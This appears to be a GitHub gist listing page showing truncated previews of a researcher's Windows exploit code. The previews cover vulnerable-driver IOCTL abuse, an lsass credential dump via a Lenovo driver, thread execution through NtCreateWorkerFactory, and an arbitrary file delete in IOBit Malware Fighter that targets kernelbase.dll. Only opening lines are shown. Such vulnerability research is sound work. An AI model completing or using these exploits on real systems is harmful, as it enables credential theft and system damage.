This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| a6ebf511dbc38b7c50f53e77d2965dfbc4aea9dcc09593df25ba8fc322075936 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 25AFF9D6516B1DFCFF60AE99DC7218203ECBA434FF74C310DFA00A123523621D | |
| image.png |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| #define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); } | |
| #define IOCTL_TRIGGER_OVERFLOW 0x80102040 | |
| DWORD64 genPattern(BYTE b) { | |
| DWORD64 retVal = b; | |
| retVal |= retVal << 8; | |
| retVal |= retVal << 16; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| IOCTL 0x40002004 : Arbitrary Physical Memory Read using MmMapIoSpace | |
| IOCTL 0x40002008 : Close a handle of your choice! + Stack-based Buffer Overflow | |
| IOCTL 0x40002000 : Arbitrary RW to IO ports | |
| */ | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| #define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); } | |
| #define IOCTL_TRIGGER_OVERFLOW 0x40002008 |
alfarom256
/ lel.cpp
Last active
June 1, 2023 17:49
dump lsass but in a weird way you probably shouldn't do in prod with a vulnerable driver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <stdio.h> | |
| #include <DbgHelp.h> | |
| #include "LenovoMemoryMgr.h" | |
| #pragma comment(lib, "dbghelp") | |
| typedef NTSTATUS(WINAPI* pNtQueryVirtualMemory)(HANDLE, PVOID, DWORD, PVOID, SIZE_T, PSIZE_T); |
alfarom256
/ Source.cpp
Last active
September 28, 2024 04:01
Thread Execution via NtCreateWorkerFactory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <stdio.h> | |
| #define WORKER_FACTORY_FULL_ACCESS 0xf00ff | |
| // https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52 | |
| typedef enum _WORKERFACTORYINFOCLASS | |
| { | |
| WorkerFactoryTimeout, // LARGE_INTEGER |
alfarom256
/ IOBitStillSucks.cpp
Created
January 6, 2025 22:54
Arbitrary File Delete in IOBit Malware Fighter "Pro"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)"; | |
| const char* strDeviceName = R"(\\.\IMFForceDelete123)"; | |
| int main() { | |
| DWORD dwReturnVal = 0; | |
| DWORD dwBytesReturned = 0; | |
| BOOL bRes = FALSE; |
OlderNewer